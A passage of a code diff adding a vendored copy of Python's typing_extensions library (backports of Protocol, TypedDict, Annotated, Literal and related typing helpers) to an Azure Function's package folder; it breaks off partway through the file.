b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions.py @@ -0,0 +1,2069 @@ +import abc +import collections +import collections.abc +import functools +import operator +import sys +import types as _types +import typing + + +# Please keep __all__ alphabetized within each category. +__all__ = [ + # Super-special typing primitives. + 'ClassVar', + 'Concatenate', + 'Final', + 'LiteralString', + 'ParamSpec', + 'ParamSpecArgs', + 'ParamSpecKwargs', + 'Self', + 'Type', + 'TypeVarTuple', + 'Unpack', + + # ABCs (from collections.abc). + 'Awaitable', + 'AsyncIterator', + 'AsyncIterable', + 'Coroutine', + 'AsyncGenerator', + 'AsyncContextManager', + 'ChainMap', + + # Concrete collection types. + 'ContextManager', + 'Counter', + 'Deque', + 'DefaultDict', + 'NamedTuple', + 'OrderedDict', + 'TypedDict', + + # Structural checks, a.k.a. protocols. + 'SupportsIndex', + + # One-off things. 
+ 'Annotated', + 'assert_never', + 'assert_type', + 'clear_overloads', + 'dataclass_transform', + 'get_overloads', + 'final', + 'get_args', + 'get_origin', + 'get_type_hints', + 'IntVar', + 'is_typeddict', + 'Literal', + 'NewType', + 'overload', + 'Protocol', + 'reveal_type', + 'runtime', + 'runtime_checkable', + 'Text', + 'TypeAlias', + 'TypeGuard', + 'TYPE_CHECKING', + 'Never', + 'NoReturn', + 'Required', + 'NotRequired', +] + +# for backward compatibility +PEP_560 = True +GenericMeta = type + +# The functions below are modified copies of typing internal helpers. +# They are needed by _ProtocolMeta and they provide support for PEP 646. + +_marker = object() + + +def _check_generic(cls, parameters, elen=_marker): + """Check correct count for parameters of a generic cls (internal helper). + This gives a nice error message in case of count mismatch. + """ + if not elen: + raise TypeError(f"{cls} is not a generic class") + if elen is _marker: + if not hasattr(cls, "__parameters__") or not cls.__parameters__: + raise TypeError(f"{cls} is not a generic class") + elen = len(cls.__parameters__) + alen = len(parameters) + if alen != elen: + if hasattr(cls, "__parameters__"): + parameters = [p for p in cls.__parameters__ if not _is_unpack(p)] + num_tv_tuples = sum(isinstance(p, TypeVarTuple) for p in parameters) + if (num_tv_tuples > 0) and (alen >= elen - num_tv_tuples): + return + raise TypeError(f"Too {'many' if alen > elen else 'few'} parameters for {cls};" + f" actual {alen}, expected {elen}") + + +if sys.version_info >= (3, 10): + def _should_collect_from_parameters(t): + return isinstance( + t, (typing._GenericAlias, _types.GenericAlias, _types.UnionType) + ) +elif sys.version_info >= (3, 9): + def _should_collect_from_parameters(t): + return isinstance(t, (typing._GenericAlias, _types.GenericAlias)) +else: + def _should_collect_from_parameters(t): + return isinstance(t, typing._GenericAlias) and not t._special + + +def _collect_type_vars(types, typevar_types=None): + """Collect all type variable contained in types in order of + first appearance (lexicographic order). For example:: + + _collect_type_vars((T, List[S, T])) == (T, S) + """ + if typevar_types is None: + typevar_types = typing.TypeVar + tvars = [] + for t in types: + if ( + isinstance(t, typevar_types) and + t not in tvars and + not _is_unpack(t) + ): + tvars.append(t) + if _should_collect_from_parameters(t): + tvars.extend([t for t in t.__parameters__ if t not in tvars]) + return tuple(tvars) + + +NoReturn = typing.NoReturn + +# Some unconstrained type variables. These are used by the container types. +# (These are not for export.) +T = typing.TypeVar('T') # Any type. +KT = typing.TypeVar('KT') # Key type. +VT = typing.TypeVar('VT') # Value type. +T_co = typing.TypeVar('T_co', covariant=True) # Any type covariant containers. +T_contra = typing.TypeVar('T_contra', contravariant=True) # Ditto contravariant. + +ClassVar = typing.ClassVar + +# On older versions of typing there is an internal class named "Final". +# 3.8+ +if hasattr(typing, 'Final') and sys.version_info[:2] >= (3, 7): + Final = typing.Final +# 3.7 +else: + class _FinalForm(typing._SpecialForm, _root=True): + + def __repr__(self): + return 'typing_extensions.' 
+ self._name + + def __getitem__(self, parameters): + item = typing._type_check(parameters, + f'{self._name} accepts only a single type.') + return typing._GenericAlias(self, (item,)) + + Final = _FinalForm('Final', + doc="""A special typing construct to indicate that a name + cannot be re-assigned or overridden in a subclass. + For example: + + MAX_SIZE: Final = 9000 + MAX_SIZE += 1 # Error reported by type checker + + class Connection: + TIMEOUT: Final[int] = 10 + class FastConnector(Connection): + TIMEOUT = 1 # Error reported by type checker + + There is no runtime checking of these properties.""") + +if sys.version_info >= (3, 11): + final = typing.final +else: + # @final exists in 3.8+, but we backport it for all versions + # before 3.11 to keep support for the __final__ attribute. + # See https://bugs.python.org/issue46342 + def final(f): + """This decorator can be used to indicate to type checkers that + the decorated method cannot be overridden, and decorated class + cannot be subclassed. For example: + + class Base: + @final + def done(self) -> None: + ... + class Sub(Base): + def done(self) -> None: # Error reported by type checker + ... + @final + class Leaf: + ... + class Other(Leaf): # Error reported by type checker + ... + + There is no runtime checking of these properties. The decorator + sets the ``__final__`` attribute to ``True`` on the decorated object + to allow runtime introspection. + """ + try: + f.__final__ = True + except (AttributeError, TypeError): + # Skip the attribute silently if it is not writable. + # AttributeError happens if the object has __slots__ or a + # read-only property, TypeError if it's a builtin class. + pass + return f + + +def IntVar(name): + return typing.TypeVar(name) + + +# 3.8+: +if hasattr(typing, 'Literal'): + Literal = typing.Literal +# 3.7: +else: + class _LiteralForm(typing._SpecialForm, _root=True): + + def __repr__(self): + return 'typing_extensions.' + self._name + + def __getitem__(self, parameters): + return typing._GenericAlias(self, parameters) + + Literal = _LiteralForm('Literal', + doc="""A type that can be used to indicate to type checkers + that the corresponding value has a value literally equivalent + to the provided parameter. For example: + + var: Literal[4] = 4 + + The type checker understands that 'var' is literally equal to + the value 4 and no other value. + + Literal[...] cannot be subclassed. There is no runtime + checking verifying that the parameter is actually a value + instead of a type.""") + + +_overload_dummy = typing._overload_dummy # noqa + + +if hasattr(typing, "get_overloads"): # 3.11+ + overload = typing.overload + get_overloads = typing.get_overloads + clear_overloads = typing.clear_overloads +else: + # {module: {qualname: {firstlineno: func}}} + _overload_registry = collections.defaultdict( + functools.partial(collections.defaultdict, dict) + ) + + def overload(func): + """Decorator for overloaded functions/methods. + + In a stub file, place two or more stub definitions for the same + function in a row, each decorated with @overload. For example: + + @overload + def utf8(value: None) -> None: ... + @overload + def utf8(value: bytes) -> bytes: ... + @overload + def utf8(value: str) -> bytes: ... + + In a non-stub file (i.e. a regular .py file), do the same but + follow it with an implementation. The implementation should *not* + be decorated with @overload. For example: + + @overload + def utf8(value: None) -> None: ... + @overload + def utf8(value: bytes) -> bytes: ... 
+ @overload + def utf8(value: str) -> bytes: ... + def utf8(value): + # implementation goes here + + The overloads for a function can be retrieved at runtime using the + get_overloads() function. + """ + # classmethod and staticmethod + f = getattr(func, "__func__", func) + try: + _overload_registry[f.__module__][f.__qualname__][ + f.__code__.co_firstlineno + ] = func + except AttributeError: + # Not a normal function; ignore. + pass + return _overload_dummy + + def get_overloads(func): + """Return all defined overloads for *func* as a sequence.""" + # classmethod and staticmethod + f = getattr(func, "__func__", func) + if f.__module__ not in _overload_registry: + return [] + mod_dict = _overload_registry[f.__module__] + if f.__qualname__ not in mod_dict: + return [] + return list(mod_dict[f.__qualname__].values()) + + def clear_overloads(): + """Clear all overloads in the registry.""" + _overload_registry.clear() + + +# This is not a real generic class. Don't use outside annotations. +Type = typing.Type + +# Various ABCs mimicking those in collections.abc. +# A few are simply re-exported for completeness. + + +Awaitable = typing.Awaitable +Coroutine = typing.Coroutine +AsyncIterable = typing.AsyncIterable +AsyncIterator = typing.AsyncIterator +Deque = typing.Deque +ContextManager = typing.ContextManager +AsyncContextManager = typing.AsyncContextManager +DefaultDict = typing.DefaultDict + +# 3.7.2+ +if hasattr(typing, 'OrderedDict'): + OrderedDict = typing.OrderedDict +# 3.7.0-3.7.2 +else: + OrderedDict = typing._alias(collections.OrderedDict, (KT, VT)) + +Counter = typing.Counter +ChainMap = typing.ChainMap +AsyncGenerator = typing.AsyncGenerator +NewType = typing.NewType +Text = typing.Text +TYPE_CHECKING = typing.TYPE_CHECKING + + +_PROTO_WHITELIST = ['Callable', 'Awaitable', + 'Iterable', 'Iterator', 'AsyncIterable', 'AsyncIterator', + 'Hashable', 'Sized', 'Container', 'Collection', 'Reversible', + 'ContextManager', 'AsyncContextManager'] + + +def _get_protocol_attrs(cls): + attrs = set() + for base in cls.__mro__[:-1]: # without object + if base.__name__ in ('Protocol', 'Generic'): + continue + annotations = getattr(base, '__annotations__', {}) + for attr in list(base.__dict__.keys()) + list(annotations.keys()): + if (not attr.startswith('_abc_') and attr not in ( + '__abstractmethods__', '__annotations__', '__weakref__', + '_is_protocol', '_is_runtime_protocol', '__dict__', + '__args__', '__slots__', + '__next_in_mro__', '__parameters__', '__origin__', + '__orig_bases__', '__extra__', '__tree_hash__', + '__doc__', '__subclasshook__', '__init__', '__new__', + '__module__', '_MutableMapping__marker', '_gorg')): + attrs.add(attr) + return attrs + + +def _is_callable_members_only(cls): + return all(callable(getattr(cls, attr, None)) for attr in _get_protocol_attrs(cls)) + + +def _maybe_adjust_parameters(cls): + """Helper function used in Protocol.__init_subclass__ and _TypedDictMeta.__new__. + + The contents of this function are very similar + to logic found in typing.Generic.__init_subclass__ + on the CPython main branch. + """ + tvars = [] + if '__orig_bases__' in cls.__dict__: + tvars = typing._collect_type_vars(cls.__orig_bases__) + # Look for Generic[T1, ..., Tn] or Protocol[T1, ..., Tn]. + # If found, tvars must be a subset of it. + # If not found, tvars is it. + # Also check for and reject plain Generic, + # and reject multiple Generic[...] and/or Protocol[...]. 
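+    # (Hedged editor's example: for class C(Mapping[KT, VT], Protocol[KT, VT])
+    # the collected tvars (KT, VT) are a subset of the Protocol[...] gvars, so
+    # the declaration is accepted; a type variable left out of Protocol[...]
+    # raises the "not listed in" TypeError below.)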
+ gvars = None + for base in cls.__orig_bases__: + if (isinstance(base, typing._GenericAlias) and + base.__origin__ in (typing.Generic, Protocol)): + # for error messages + the_base = base.__origin__.__name__ + if gvars is not None: + raise TypeError( + "Cannot inherit from Generic[...]" + " and/or Protocol[...] multiple types.") + gvars = base.__parameters__ + if gvars is None: + gvars = tvars + else: + tvarset = set(tvars) + gvarset = set(gvars) + if not tvarset <= gvarset: + s_vars = ', '.join(str(t) for t in tvars if t not in gvarset) + s_args = ', '.join(str(g) for g in gvars) + raise TypeError(f"Some type variables ({s_vars}) are" + f" not listed in {the_base}[{s_args}]") + tvars = gvars + cls.__parameters__ = tuple(tvars) + + +# 3.8+ +if hasattr(typing, 'Protocol'): + Protocol = typing.Protocol +# 3.7 +else: + + def _no_init(self, *args, **kwargs): + if type(self)._is_protocol: + raise TypeError('Protocols cannot be instantiated') + + class _ProtocolMeta(abc.ABCMeta): + # This metaclass is a bit unfortunate and exists only because of the lack + # of __instancehook__. + def __instancecheck__(cls, instance): + # We need this method for situations where attributes are + # assigned in __init__. + if ((not getattr(cls, '_is_protocol', False) or + _is_callable_members_only(cls)) and + issubclass(instance.__class__, cls)): + return True + if cls._is_protocol: + if all(hasattr(instance, attr) and + (not callable(getattr(cls, attr, None)) or + getattr(instance, attr) is not None) + for attr in _get_protocol_attrs(cls)): + return True + return super().__instancecheck__(instance) + + class Protocol(metaclass=_ProtocolMeta): + # There is quite a lot of overlapping code with typing.Generic. + # Unfortunately it is hard to avoid this while these live in two different + # modules. The duplicated code will be removed when Protocol is moved to typing. + """Base class for protocol classes. Protocol classes are defined as:: + + class Proto(Protocol): + def meth(self) -> int: + ... + + Such classes are primarily used with static type checkers that recognize + structural subtyping (static duck-typing), for example:: + + class C: + def meth(self) -> int: + return 0 + + def func(x: Proto) -> int: + return x.meth() + + func(C()) # Passes static type check + + See PEP 544 for details. Protocol classes decorated with + @typing_extensions.runtime act as simple-minded runtime protocol that checks + only the presence of given attributes, ignoring their type signatures. + + Protocol classes can be generic, they are defined as:: + + class GenProto(Protocol[T]): + def meth(self) -> T: + ... + """ + __slots__ = () + _is_protocol = True + + def __new__(cls, *args, **kwds): + if cls is Protocol: + raise TypeError("Type Protocol cannot be instantiated; " + "it can only be used as a base class") + return super().__new__(cls) + + @typing._tp_cache + def __class_getitem__(cls, params): + if not isinstance(params, tuple): + params = (params,) + if not params and cls is not typing.Tuple: + raise TypeError( + f"Parameter list to {cls.__qualname__}[...] cannot be empty") + msg = "Parameters to generic types must be types." + params = tuple(typing._type_check(p, msg) for p in params) # noqa + if cls is Protocol: + # Generic can only be subscripted with unique type variables. + if not all(isinstance(p, typing.TypeVar) for p in params): + i = 0 + while isinstance(params[i], typing.TypeVar): + i += 1 + raise TypeError( + "Parameters to Protocol[...] must all be type variables." 
+ f" Parameter {i + 1} is {params[i]}") + if len(set(params)) != len(params): + raise TypeError( + "Parameters to Protocol[...] must all be unique") + else: + # Subscripting a regular Generic subclass. + _check_generic(cls, params, len(cls.__parameters__)) + return typing._GenericAlias(cls, params) + + def __init_subclass__(cls, *args, **kwargs): + if '__orig_bases__' in cls.__dict__: + error = typing.Generic in cls.__orig_bases__ + else: + error = typing.Generic in cls.__bases__ + if error: + raise TypeError("Cannot inherit from plain Generic") + _maybe_adjust_parameters(cls) + + # Determine if this is a protocol or a concrete subclass. + if not cls.__dict__.get('_is_protocol', None): + cls._is_protocol = any(b is Protocol for b in cls.__bases__) + + # Set (or override) the protocol subclass hook. + def _proto_hook(other): + if not cls.__dict__.get('_is_protocol', None): + return NotImplemented + if not getattr(cls, '_is_runtime_protocol', False): + if sys._getframe(2).f_globals['__name__'] in ['abc', 'functools']: + return NotImplemented + raise TypeError("Instance and class checks can only be used with" + " @runtime protocols") + if not _is_callable_members_only(cls): + if sys._getframe(2).f_globals['__name__'] in ['abc', 'functools']: + return NotImplemented + raise TypeError("Protocols with non-method members" + " don't support issubclass()") + if not isinstance(other, type): + # Same error as for issubclass(1, int) + raise TypeError('issubclass() arg 1 must be a class') + for attr in _get_protocol_attrs(cls): + for base in other.__mro__: + if attr in base.__dict__: + if base.__dict__[attr] is None: + return NotImplemented + break + annotations = getattr(base, '__annotations__', {}) + if (isinstance(annotations, typing.Mapping) and + attr in annotations and + isinstance(other, _ProtocolMeta) and + other._is_protocol): + break + else: + return NotImplemented + return True + if '__subclasshook__' not in cls.__dict__: + cls.__subclasshook__ = _proto_hook + + # We have nothing more to do for non-protocols. + if not cls._is_protocol: + return + + # Check consistency of bases. + for base in cls.__bases__: + if not (base in (object, typing.Generic) or + base.__module__ == 'collections.abc' and + base.__name__ in _PROTO_WHITELIST or + isinstance(base, _ProtocolMeta) and base._is_protocol): + raise TypeError('Protocols can only inherit from other' + f' protocols, got {repr(base)}') + cls.__init__ = _no_init + + +# 3.8+ +if hasattr(typing, 'runtime_checkable'): + runtime_checkable = typing.runtime_checkable +# 3.7 +else: + def runtime_checkable(cls): + """Mark a protocol class as a runtime protocol, so that it + can be used with isinstance() and issubclass(). Raise TypeError + if applied to a non-protocol class. + + This allows a simple-minded structural check very similar to the + one-offs in collections.abc such as Hashable. + """ + if not isinstance(cls, _ProtocolMeta) or not cls._is_protocol: + raise TypeError('@runtime_checkable can be only applied to protocol classes,' + f' got {cls!r}') + cls._is_runtime_protocol = True + return cls + + +# Exists for backwards compatibility. 
+runtime = runtime_checkable + + +# 3.8+ +if hasattr(typing, 'SupportsIndex'): + SupportsIndex = typing.SupportsIndex +# 3.7 +else: + @runtime_checkable + class SupportsIndex(Protocol): + __slots__ = () + + @abc.abstractmethod + def __index__(self) -> int: + pass + + +if hasattr(typing, "Required"): + # The standard library TypedDict in Python 3.8 does not store runtime information + # about which (if any) keys are optional. See https://bugs.python.org/issue38834 + # The standard library TypedDict in Python 3.9.0/1 does not honour the "total" + # keyword with old-style TypedDict(). See https://bugs.python.org/issue42059 + # The standard library TypedDict below Python 3.11 does not store runtime + # information about optional and required keys when using Required or NotRequired. + # Generic TypedDicts are also impossible using typing.TypedDict on Python <3.11. + TypedDict = typing.TypedDict + _TypedDictMeta = typing._TypedDictMeta + is_typeddict = typing.is_typeddict +else: + def _check_fails(cls, other): + try: + if sys._getframe(1).f_globals['__name__'] not in ['abc', + 'functools', + 'typing']: + # Typed dicts are only for static structural subtyping. + raise TypeError('TypedDict does not support instance and class checks') + except (AttributeError, ValueError): + pass + return False + + def _dict_new(*args, **kwargs): + if not args: + raise TypeError('TypedDict.__new__(): not enough arguments') + _, args = args[0], args[1:] # allow the "cls" keyword be passed + return dict(*args, **kwargs) + + _dict_new.__text_signature__ = '($cls, _typename, _fields=None, /, **kwargs)' + + def _typeddict_new(*args, total=True, **kwargs): + if not args: + raise TypeError('TypedDict.__new__(): not enough arguments') + _, args = args[0], args[1:] # allow the "cls" keyword be passed + if args: + typename, args = args[0], args[1:] # allow the "_typename" keyword be passed + elif '_typename' in kwargs: + typename = kwargs.pop('_typename') + import warnings + warnings.warn("Passing '_typename' as keyword argument is deprecated", + DeprecationWarning, stacklevel=2) + else: + raise TypeError("TypedDict.__new__() missing 1 required positional " + "argument: '_typename'") + if args: + try: + fields, = args # allow the "_fields" keyword be passed + except ValueError: + raise TypeError('TypedDict.__new__() takes from 2 to 3 ' + f'positional arguments but {len(args) + 2} ' + 'were given') + elif '_fields' in kwargs and len(kwargs) == 1: + fields = kwargs.pop('_fields') + import warnings + warnings.warn("Passing '_fields' as keyword argument is deprecated", + DeprecationWarning, stacklevel=2) + else: + fields = None + + if fields is None: + fields = kwargs + elif kwargs: + raise TypeError("TypedDict takes either a dict or keyword arguments," + " but not both") + + ns = {'__annotations__': dict(fields)} + try: + # Setting correct module is necessary to make typed dict classes pickleable. + ns['__module__'] = sys._getframe(1).f_globals.get('__name__', '__main__') + except (AttributeError, ValueError): + pass + + return _TypedDictMeta(typename, (), ns, total=total) + + _typeddict_new.__text_signature__ = ('($cls, _typename, _fields=None,' + ' /, *, total=True, **kwargs)') + + class _TypedDictMeta(type): + def __init__(cls, name, bases, ns, total=True): + super().__init__(name, bases, ns) + + def __new__(cls, name, bases, ns, total=True): + # Create new typed dict class object. + # This method is called directly when TypedDict is subclassed, + # or via _typeddict_new when TypedDict is instantiated. 
This way + # TypedDict supports all three syntaxes described in its docstring. + # Subclasses and instances of TypedDict return actual dictionaries + # via _dict_new. + ns['__new__'] = _typeddict_new if name == 'TypedDict' else _dict_new + # Don't insert typing.Generic into __bases__ here, + # or Generic.__init_subclass__ will raise TypeError + # in the super().__new__() call. + # Instead, monkey-patch __bases__ onto the class after it's been created. + tp_dict = super().__new__(cls, name, (dict,), ns) + + if any(issubclass(base, typing.Generic) for base in bases): + tp_dict.__bases__ = (typing.Generic, dict) + _maybe_adjust_parameters(tp_dict) + + annotations = {} + own_annotations = ns.get('__annotations__', {}) + msg = "TypedDict('Name', {f0: t0, f1: t1, ...}); each t must be a type" + own_annotations = { + n: typing._type_check(tp, msg) for n, tp in own_annotations.items() + } + required_keys = set() + optional_keys = set() + + for base in bases: + annotations.update(base.__dict__.get('__annotations__', {})) + required_keys.update(base.__dict__.get('__required_keys__', ())) + optional_keys.update(base.__dict__.get('__optional_keys__', ())) + + annotations.update(own_annotations) + for annotation_key, annotation_type in own_annotations.items(): + annotation_origin = get_origin(annotation_type) + if annotation_origin is Annotated: + annotation_args = get_args(annotation_type) + if annotation_args: + annotation_type = annotation_args[0] + annotation_origin = get_origin(annotation_type) + + if annotation_origin is Required: + required_keys.add(annotation_key) + elif annotation_origin is NotRequired: + optional_keys.add(annotation_key) + elif total: + required_keys.add(annotation_key) + else: + optional_keys.add(annotation_key) + + tp_dict.__annotations__ = annotations + tp_dict.__required_keys__ = frozenset(required_keys) + tp_dict.__optional_keys__ = frozenset(optional_keys) + if not hasattr(tp_dict, '__total__'): + tp_dict.__total__ = total + return tp_dict + + __instancecheck__ = __subclasscheck__ = _check_fails + + TypedDict = _TypedDictMeta('TypedDict', (dict,), {}) + TypedDict.__module__ = __name__ + TypedDict.__doc__ = \ + """A simple typed name space. At runtime it is equivalent to a plain dict. + + TypedDict creates a dictionary type that expects all of its + instances to have a certain set of keys, with each key + associated with a value of a consistent type. This expectation + is not checked at runtime but is only enforced by type checkers. + Usage:: + + class Point2D(TypedDict): + x: int + y: int + label: str + + a: Point2D = {'x': 1, 'y': 2, 'label': 'good'} # OK + b: Point2D = {'z': 3, 'label': 'bad'} # Fails type check + + assert Point2D(x=1, y=2, label='first') == dict(x=1, y=2, label='first') + + The type info can be accessed via the Point2D.__annotations__ dict, and + the Point2D.__required_keys__ and Point2D.__optional_keys__ frozensets. 
+ TypedDict supports two additional equivalent forms:: + + Point2D = TypedDict('Point2D', x=int, y=int, label=str) + Point2D = TypedDict('Point2D', {'x': int, 'y': int, 'label': str}) + + The class syntax is only supported in Python 3.6+, while two other + syntax forms work for Python 2.7 and 3.2+ + """ + + if hasattr(typing, "_TypedDictMeta"): + _TYPEDDICT_TYPES = (typing._TypedDictMeta, _TypedDictMeta) + else: + _TYPEDDICT_TYPES = (_TypedDictMeta,) + + def is_typeddict(tp): + """Check if an annotation is a TypedDict class + + For example:: + class Film(TypedDict): + title: str + year: int + + is_typeddict(Film) # => True + is_typeddict(Union[list, str]) # => False + """ + return isinstance(tp, tuple(_TYPEDDICT_TYPES)) + + +if hasattr(typing, "assert_type"): + assert_type = typing.assert_type + +else: + def assert_type(__val, __typ): + """Assert (to the type checker) that the value is of the given type. + + When the type checker encounters a call to assert_type(), it + emits an error if the value is not of the specified type:: + + def greet(name: str) -> None: + assert_type(name, str) # ok + assert_type(name, int) # type checker error + + At runtime this returns the first argument unchanged and otherwise + does nothing. + """ + return __val + + +if hasattr(typing, "Required"): + get_type_hints = typing.get_type_hints +else: + import functools + import types + + # replaces _strip_annotations() + def _strip_extras(t): + """Strips Annotated, Required and NotRequired from a given type.""" + if isinstance(t, _AnnotatedAlias): + return _strip_extras(t.__origin__) + if hasattr(t, "__origin__") and t.__origin__ in (Required, NotRequired): + return _strip_extras(t.__args__[0]) + if isinstance(t, typing._GenericAlias): + stripped_args = tuple(_strip_extras(a) for a in t.__args__) + if stripped_args == t.__args__: + return t + return t.copy_with(stripped_args) + if hasattr(types, "GenericAlias") and isinstance(t, types.GenericAlias): + stripped_args = tuple(_strip_extras(a) for a in t.__args__) + if stripped_args == t.__args__: + return t + return types.GenericAlias(t.__origin__, stripped_args) + if hasattr(types, "UnionType") and isinstance(t, types.UnionType): + stripped_args = tuple(_strip_extras(a) for a in t.__args__) + if stripped_args == t.__args__: + return t + return functools.reduce(operator.or_, stripped_args) + + return t + + def get_type_hints(obj, globalns=None, localns=None, include_extras=False): + """Return type hints for an object. + + This is often the same as obj.__annotations__, but it handles + forward references encoded as string literals, adds Optional[t] if a + default value equal to None is set and recursively replaces all + 'Annotated[T, ...]', 'Required[T]' or 'NotRequired[T]' with 'T' + (unless 'include_extras=True'). + + The argument may be a module, class, method, or function. The annotations + are returned as a dictionary. For classes, annotations include also + inherited members. + + TypeError is raised if the argument is not of a type that can contain + annotations, and an empty dictionary is returned if no annotations are + present. + + BEWARE -- the behavior of globalns and localns is counterintuitive + (unless you are familiar with how eval() and exec() work). The + search order is locals first, then globals. + + - If no dict arguments are passed, an attempt is made to use the + globals from obj (or the respective module's globals for classes), + and these are also used as the locals. If the object does not appear + to have globals, an empty dictionary is used. 
+ + - If one dict argument is passed, it is used for both globals and + locals. + + - If two dict arguments are passed, they specify globals and + locals, respectively. + """ + if hasattr(typing, "Annotated"): + hint = typing.get_type_hints( + obj, globalns=globalns, localns=localns, include_extras=True + ) + else: + hint = typing.get_type_hints(obj, globalns=globalns, localns=localns) + if include_extras: + return hint + return {k: _strip_extras(t) for k, t in hint.items()} + + +# Python 3.9+ has PEP 593 (Annotated) +if hasattr(typing, 'Annotated'): + Annotated = typing.Annotated + # Not exported and not a public API, but needed for get_origin() and get_args() + # to work. + _AnnotatedAlias = typing._AnnotatedAlias +# 3.7-3.8 +else: + class _AnnotatedAlias(typing._GenericAlias, _root=True): + """Runtime representation of an annotated type. + + At its core 'Annotated[t, dec1, dec2, ...]' is an alias for the type 't' + with extra annotations. The alias behaves like a normal typing alias, + instantiating is the same as instantiating the underlying type, binding + it to types is also the same. + """ + def __init__(self, origin, metadata): + if isinstance(origin, _AnnotatedAlias): + metadata = origin.__metadata__ + metadata + origin = origin.__origin__ + super().__init__(origin, origin) + self.__metadata__ = metadata + + def copy_with(self, params): + assert len(params) == 1 + new_type = params[0] + return _AnnotatedAlias(new_type, self.__metadata__) + + def __repr__(self): + return (f"typing_extensions.Annotated[{typing._type_repr(self.__origin__)}, " + f"{', '.join(repr(a) for a in self.__metadata__)}]") + + def __reduce__(self): + return operator.getitem, ( + Annotated, (self.__origin__,) + self.__metadata__ + ) + + def __eq__(self, other): + if not isinstance(other, _AnnotatedAlias): + return NotImplemented + if self.__origin__ != other.__origin__: + return False + return self.__metadata__ == other.__metadata__ + + def __hash__(self): + return hash((self.__origin__, self.__metadata__)) + + class Annotated: + """Add context specific metadata to a type. + + Example: Annotated[int, runtime_check.Unsigned] indicates to the + hypothetical runtime_check module that this type is an unsigned int. + Every other consumer of this type can ignore this metadata and treat + this type as int. + + The first argument to Annotated must be a valid type (and will be in + the __origin__ field), the remaining arguments are kept as a tuple in + the __extra__ field. + + Details: + + - It's an error to call `Annotated` with less than two arguments. + - Nested Annotated are flattened:: + + Annotated[Annotated[T, Ann1, Ann2], Ann3] == Annotated[T, Ann1, Ann2, Ann3] + + - Instantiating an annotated type is equivalent to instantiating the + underlying type:: + + Annotated[C, Ann1](5) == C(5) + + - Annotated can be used as a generic type alias:: + + Optimized = Annotated[T, runtime.Optimize()] + Optimized[int] == Annotated[int, runtime.Optimize()] + + OptimizedList = Annotated[List[T], runtime.Optimize()] + OptimizedList[int] == Annotated[List[int], runtime.Optimize()] + """ + + __slots__ = () + + def __new__(cls, *args, **kwargs): + raise TypeError("Type Annotated cannot be instantiated.") + + @typing._tp_cache + def __class_getitem__(cls, params): + if not isinstance(params, tuple) or len(params) < 2: + raise TypeError("Annotated[...] 
should be used " + "with at least two arguments (a type and an " + "annotation).") + allowed_special_forms = (ClassVar, Final) + if get_origin(params[0]) in allowed_special_forms: + origin = params[0] + else: + msg = "Annotated[t, ...]: t must be a type." + origin = typing._type_check(params[0], msg) + metadata = tuple(params[1:]) + return _AnnotatedAlias(origin, metadata) + + def __init_subclass__(cls, *args, **kwargs): + raise TypeError( + f"Cannot subclass {cls.__module__}.Annotated" + ) + +# Python 3.8 has get_origin() and get_args() but those implementations aren't +# Annotated-aware, so we can't use those. Python 3.9's versions don't support +# ParamSpecArgs and ParamSpecKwargs, so only Python 3.10's versions will do. +if sys.version_info[:2] >= (3, 10): + get_origin = typing.get_origin + get_args = typing.get_args +# 3.7-3.9 +else: + try: + # 3.9+ + from typing import _BaseGenericAlias + except ImportError: + _BaseGenericAlias = typing._GenericAlias + try: + # 3.9+ + from typing import GenericAlias as _typing_GenericAlias + except ImportError: + _typing_GenericAlias = typing._GenericAlias + + def get_origin(tp): + """Get the unsubscripted version of a type. + + This supports generic types, Callable, Tuple, Union, Literal, Final, ClassVar + and Annotated. Return None for unsupported types. Examples:: + + get_origin(Literal[42]) is Literal + get_origin(int) is None + get_origin(ClassVar[int]) is ClassVar + get_origin(Generic) is Generic + get_origin(Generic[T]) is Generic + get_origin(Union[T, int]) is Union + get_origin(List[Tuple[T, T]][int]) == list + get_origin(P.args) is P + """ + if isinstance(tp, _AnnotatedAlias): + return Annotated + if isinstance(tp, (typing._GenericAlias, _typing_GenericAlias, _BaseGenericAlias, + ParamSpecArgs, ParamSpecKwargs)): + return tp.__origin__ + if tp is typing.Generic: + return typing.Generic + return None + + def get_args(tp): + """Get type arguments with all substitutions performed. + + For unions, basic simplifications used by Union constructor are performed. + Examples:: + get_args(Dict[str, int]) == (str, int) + get_args(int) == () + get_args(Union[int, Union[T, int], str][int]) == (int, str) + get_args(Union[int, Tuple[T, int]][str]) == (int, Tuple[str, int]) + get_args(Callable[[], T][int]) == ([], int) + """ + if isinstance(tp, _AnnotatedAlias): + return (tp.__origin__,) + tp.__metadata__ + if isinstance(tp, (typing._GenericAlias, _typing_GenericAlias)): + if getattr(tp, "_special", False): + return () + res = tp.__args__ + if get_origin(tp) is collections.abc.Callable and res[0] is not Ellipsis: + res = (list(res[:-1]), res[-1]) + return res + return () + + +# 3.10+ +if hasattr(typing, 'TypeAlias'): + TypeAlias = typing.TypeAlias +# 3.9 +elif sys.version_info[:2] >= (3, 9): + class _TypeAliasForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' + self._name + + @_TypeAliasForm + def TypeAlias(self, parameters): + """Special marker indicating that an assignment should + be recognized as a proper type alias definition by type + checkers. + + For example:: + + Predicate: TypeAlias = Callable[..., bool] + + It's invalid when used anywhere except as in the example above. + """ + raise TypeError(f"{self} is not subscriptable") +# 3.7-3.8 +else: + class _TypeAliasForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' 
+ self._name
+
+    TypeAlias = _TypeAliasForm('TypeAlias',
+                               doc="""Special marker indicating that an assignment should
+                               be recognized as a proper type alias definition by type
+                               checkers.
+
+                               For example::
+
+                                   Predicate: TypeAlias = Callable[..., bool]
+
+                               It's invalid when used anywhere except as in the example
+                               above.""")
+
+
+# Python 3.10+ has PEP 612
+if hasattr(typing, 'ParamSpecArgs'):
+    ParamSpecArgs = typing.ParamSpecArgs
+    ParamSpecKwargs = typing.ParamSpecKwargs
+# 3.7-3.9
+else:
+    class _Immutable:
+        """Mixin to indicate that object should not be copied."""
+        __slots__ = ()
+
+        def __copy__(self):
+            return self
+
+        def __deepcopy__(self, memo):
+            return self
+
+    class ParamSpecArgs(_Immutable):
+        """The args for a ParamSpec object.
+
+        Given a ParamSpec object P, P.args is an instance of ParamSpecArgs.
+
+        ParamSpecArgs objects have a reference back to their ParamSpec:
+
+        P.args.__origin__ is P
+
+        This type is meant for runtime introspection and has no special meaning to
+        static type checkers.
+        """
+        def __init__(self, origin):
+            self.__origin__ = origin
+
+        def __repr__(self):
+            return f"{self.__origin__.__name__}.args"
+
